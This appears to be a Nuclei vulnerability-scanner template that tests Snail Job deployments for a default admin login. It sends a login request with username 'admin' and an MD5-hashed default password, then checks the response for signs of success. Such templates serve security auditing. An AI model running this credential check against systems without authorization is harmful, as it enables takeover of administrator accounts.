id: snail-job-WeakPassword
info:
  name: snail-job-WeakPassword
  author: lemnlove7
  severity: high
http:
  - raw:
      - |-
        POST /snail-job/auth/login HTTP/1.1
        Host: {{Hostname}}
        Sec-Ch-Ua-Platform: "macOS"
        Sec-Ch-Ua: "Google Chrome";v="143", "Chromium";v="143", "Not A(Brand";v="24"
        Timeout: 6000
        Sec-Ch-Ua-Mobile: ?0
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
        Accept: application/json, text/plain, */*
        Content-Type: application/json
        Connection: keep-alive
        
        {"username":"admin","password":"21232f297a57a5a743894a0e4a801fc3"}
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - namespaceIds
          - username
          - message
    matchers-condition: and
